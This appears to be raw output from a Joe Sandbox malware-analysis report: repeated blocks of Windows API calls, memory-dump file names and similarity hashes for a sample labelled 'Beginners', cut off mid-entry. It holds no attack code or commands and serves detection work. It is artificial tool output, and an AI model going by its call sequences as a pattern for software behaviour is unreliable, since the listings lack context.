                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000EBCEC,?,?,?), ref: 0013CC16
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID:
                                          • API String ID: 2864067406-0
                                          • Opcode ID: 07a4015f611f0ab230ff6d82dcb2185a934add5600811cf1a7b1ed7f5471a6ef
                                          • Instruction ID: bdec606fac7e1b03f500a727fdaab2a1624f42748369c7a7f85e5dc4ac3fe6db
                                          • Opcode Fuzzy Hash: 07a4015f611f0ab230ff6d82dcb2185a934add5600811cf1a7b1ed7f5471a6ef
                                          • Instruction Fuzzy Hash: 6831A035600158AFCB15CF59CC59EFABBB5EB4A350F044099F909AB6A1C7329D90EFA0
                                          APIs
                                          • __setmode.LIBCMT ref: 000D0BE2
                                            • Part of subcall function 000C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00117E51,?,?,00000000), ref: 000C4041
                                            • Part of subcall function 000C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00117E51,?,?,00000000,?,?), ref: 000C4065
                                          • _fprintf.LIBCMT ref: 000D0C19
                                          • OutputDebugStringW.KERNEL32(?), ref: 0010694C
                                            • Part of subcall function 000D4CCA: _flsall.LIBCMT ref: 000D4CE3
                                          • __setmode.LIBCMT ref: 000D0C4E
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                          • String ID:
                                          • API String ID: 521402451-0
                                          • Opcode ID: 984b8f60ec606f59ed9eaaaa46f0444839b28ae71019d6049bac81356e53e929
                                          • Instruction ID: 8dec2160417251df2017cd7c1e1022ff2d5b18a40b7762cba3dc747ce0ea549d
                                          • Opcode Fuzzy Hash: 984b8f60ec606f59ed9eaaaa46f0444839b28ae71019d6049bac81356e53e929
                                          • Instruction Fuzzy Hash: 0B11D2319043046BCB18BBA4AC47AFEBB699F41320F14415BF208563C3DF71599297B5
                                          APIs
                                            • Part of subcall function 00108D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00108D3F
                                            • Part of subcall function 00108D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00108D49
                                            • Part of subcall function 00108D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D58
                                            • Part of subcall function 00108D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D5F
                                            • Part of subcall function 00108D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D75
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001092C1
                                          • _memcmp.LIBCMT ref: 001092E4
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0010931A
                                          • HeapFree.KERNEL32(00000000), ref: 00109321
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                          • String ID:
                                          • API String ID: 1592001646-0
                                          • Opcode ID: 4c8d052c43ca4d2bb23c66e2100a2126d8244a06c5e3f1c8dd6519118a2f8529
                                          • Instruction ID: 8f8fceb52ef527ae5b71886e3e9f99a240f96f764fc3a7744bbe8279df77c95a
                                          • Opcode Fuzzy Hash: 4c8d052c43ca4d2bb23c66e2100a2126d8244a06c5e3f1c8dd6519118a2f8529
                                          • Instruction Fuzzy Hash: 9B21AF71E40108EFDB10DFA4C955BEEB7B8FF44301F044059E894AB292D7B0AA44CFA0
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EC), ref: 001363BD
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001363D7
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001363E5
                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001363F3
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$Long$AttributesLayered
                                          • String ID:
                                          • API String ID: 2169480361-0
                                          • Opcode ID: dfcf4ddf4a19ebe40bb20d2ec21fecc37c27fa3378e2e05e7a392da2955d43a0
                                          • Instruction ID: 68db90d04205d5058b2a549a2d310eea51e996c15155767d342337b47932cb94
                                          • Opcode Fuzzy Hash: dfcf4ddf4a19ebe40bb20d2ec21fecc37c27fa3378e2e05e7a392da2955d43a0
                                          • Instruction Fuzzy Hash: D711AC35305514AFDB05AB24DC55FBA77A9EF86320F148118FA1ACB2E2CBB5AD408B94
                                          APIs
                                            • Part of subcall function 0010F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0010E46F,?,?,?,0010F262,00000000,000000EF,00000119,?,?), ref: 0010F867
                                            • Part of subcall function 0010F858: lstrcpyW.KERNEL32(00000000,?,?,0010E46F,?,?,?,0010F262,00000000,000000EF,00000119,?,?,00000000), ref: 0010F88D
                                            • Part of subcall function 0010F858: lstrcmpiW.KERNEL32(00000000,?,0010E46F,?,?,?,0010F262,00000000,000000EF,00000119,?,?), ref: 0010F8BE
                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0010F262,00000000,000000EF,00000119,?,?,00000000), ref: 0010E488
                                          • lstrcpyW.KERNEL32(00000000,?,?,0010F262,00000000,000000EF,00000119,?,?,00000000), ref: 0010E4AE
                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0010F262,00000000,000000EF,00000119,?,?,00000000), ref: 0010E4E2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen
                                          • String ID: cdecl
                                          • API String ID: 4031866154-3896280584
                                          • Opcode ID: 62983fdf16da373a1e58a7cb51651694c338fff6b4d794748ee921146e1c020b
                                          • Instruction ID: 06554c4e41d82400a34f1083a3645febef3d48b146311df88cf19addb02aa59b
                                          • Opcode Fuzzy Hash: 62983fdf16da373a1e58a7cb51651694c338fff6b4d794748ee921146e1c020b
                                          • Instruction Fuzzy Hash: 1711033A100344AFCB25AF25DC09D7A7BE8FF45310B40442BF946CB2A0EBB1D890CBA0
                                          APIs
                                          • _free.LIBCMT ref: 000E5331
                                            • Part of subcall function 000D593C: __FF_MSGBANNER.LIBCMT ref: 000D5953
                                            • Part of subcall function 000D593C: __NMSG_WRITE.LIBCMT ref: 000D595A
                                            • Part of subcall function 000D593C: RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,?,00000004,?,?,000D1003,?), ref: 000D597F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: 5bdd186e1845ee716ad739cedd7cce2f7d84c55db98210550683e35a82ffeb04
                                          • Instruction ID: ca30635f243a26e330c34eeda845a0ccc0e29d5d473fe6194fc1ee08110c3aa6
                                          • Opcode Fuzzy Hash: 5bdd186e1845ee716ad739cedd7cce2f7d84c55db98210550683e35a82ffeb04
                                          • Instruction Fuzzy Hash: 5C113D31405F45AFCB353F72AC0169E3BD56F153A6F204D27F918A62E2DEB08A808760
                                          APIs
                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00114385
                                          • _memset.LIBCMT ref: 001143A6
                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001143F8
                                          • CloseHandle.KERNEL32(00000000), ref: 00114401
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                          • String ID:
                                          • API String ID: 1157408455-0
                                          • Opcode ID: d48aa419134e5449774d16529e74c022a712185470bbd8bfeeea6ce1709e8088
                                          • Instruction ID: 8313ddadf310c2239499731be170c5c64d63f0ae8c8fee3b7495e596e37fc7c8
                                          • Opcode Fuzzy Hash: d48aa419134e5449774d16529e74c022a712185470bbd8bfeeea6ce1709e8088
                                          • Instruction Fuzzy Hash: 4F11AB759013287AD7309BA5AC4DFEBBB7CEF45B60F1045AAF908D7190D6744E808BA4
                                          APIs
                                            • Part of subcall function 000C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00117E51,?,?,00000000), ref: 000C4041
                                            • Part of subcall function 000C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00117E51,?,?,00000000,?,?), ref: 000C4065
                                          • gethostbyname.WSOCK32(?,?,?), ref: 00126A84
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00126A8F
                                          • _memmove.LIBCMT ref: 00126ABC
                                          • inet_ntoa.WSOCK32(?), ref: 00126AC7
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                          • String ID:
                                          • API String ID: 1504782959-0
                                          • Opcode ID: 691c239393c2eefa9dc0f4f6e3535e18b8074bbf1d3f14bed1b5a066a91e7ab4
                                          • Instruction ID: bce9b8db80a655d65f39c2a74f98aba0ab5ceb6f63d722983cb6bafe2c7e2a4c
                                          • Opcode Fuzzy Hash: 691c239393c2eefa9dc0f4f6e3535e18b8074bbf1d3f14bed1b5a066a91e7ab4
                                          • Instruction Fuzzy Hash: 9B115E76900109AFCB05EFA4DD86DEEB7B8AF19310B144065F506A72A3DF31AE14CBA1
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • DefDlgProcW.USER32(?,00000020,?), ref: 000B16B4
                                          • GetClientRect.USER32(?,?), ref: 000EB93C
                                          • GetCursorPos.USER32(?), ref: 000EB946
                                          • ScreenToClient.USER32(?,?), ref: 000EB951
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Client$CursorLongProcRectScreenWindow
                                          • String ID:
                                          • API String ID: 4127811313-0
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00109719
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0010972B
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00109741
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0010975C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000B214F
                                          • GetStockObject.GDI32(00000011), ref: 000B2163
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 000B216D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CreateMessageObjectSendStockWindow
                                          • String ID:
                                          • API String ID: 3970641297-0
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001104EC,?,0011153F,?,00008000), ref: 0011195E
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,001104EC,?,0011153F,?,00008000), ref: 00111983
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001104EC,?,0011153F,?,00008000), ref: 0011198D
                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,001104EC,?,0011153F,?,00008000), ref: 001119C0
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CounterPerformanceQuerySleep
                                          • String ID:
                                          • API String ID: 2875609808-0
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0013E1EA
                                          • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0013E201
                                          • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0013E216
                                          • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0013E234
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Type$Register$FileLoadModuleNameUser
                                          • String ID:
                                          • API String ID: 1352324309-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 0013B956
                                          • ScreenToClient.USER32(?,?), ref: 0013B96E
                                          • ScreenToClient.USER32(?,?), ref: 0013B992
                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0013B9AD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          APIs
                                          • _memset.LIBCMT ref: 0013BCB6
                                          • _memset.LIBCMT ref: 0013BCC5
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00178F20,00178F64), ref: 0013BCF4
                                          • CloseHandle.KERNEL32 ref: 0013BD06
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memset$CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3277943733-0
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 001171A1
                                            • Part of subcall function 00117C7F: _memset.LIBCMT ref: 00117CB4
                                          • _memmove.LIBCMT ref: 001171C4
                                          • _memset.LIBCMT ref: 001171D1
                                          • LeaveCriticalSection.KERNEL32(?), ref: 001171E1
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                          • String ID:
                                          • API String ID: 48991266-0
                                          APIs
                                            • Part of subcall function 000B16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000B1729
                                            • Part of subcall function 000B16CF: SelectObject.GDI32(?,00000000), ref: 000B1738
                                            • Part of subcall function 000B16CF: BeginPath.GDI32(?), ref: 000B174F
                                            • Part of subcall function 000B16CF: SelectObject.GDI32(?,00000000), ref: 000B1778
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0013C3E8
                                          • LineTo.GDI32(00000000,?,?), ref: 0013C3F5
                                          • EndPath.GDI32(00000000), ref: 0013C405
                                          • StrokePath.GDI32(00000000), ref: 0013C413
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                          • String ID:
                                          • API String ID: 1539411459-0
                                          APIs
                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0010AA6F
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0010AA82
                                          • GetCurrentThreadId.KERNEL32 ref: 0010AA89
                                          • AttachThreadInput.USER32(00000000), ref: 0010AA90
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                          • String ID:
                                          • API String ID: 2710830443-0
                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 000B260D
                                          • SetTextColor.GDI32(?,000000FF), ref: 000B2617
                                          • SetBkMode.GDI32(?,00000001), ref: 000B262C
                                          • GetStockObject.GDI32(00000005), ref: 000B2634
                                          • GetWindowDC.USER32(?,00000000), ref: 000EC1C4
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 000EC1D1
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 000EC1EA
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 000EC203
                                          • GetPixel.GDI32(00000000,?,?), ref: 000EC223
                                          • ReleaseDC.USER32(?,00000000), ref: 000EC22E
                                          Memory Dump Source
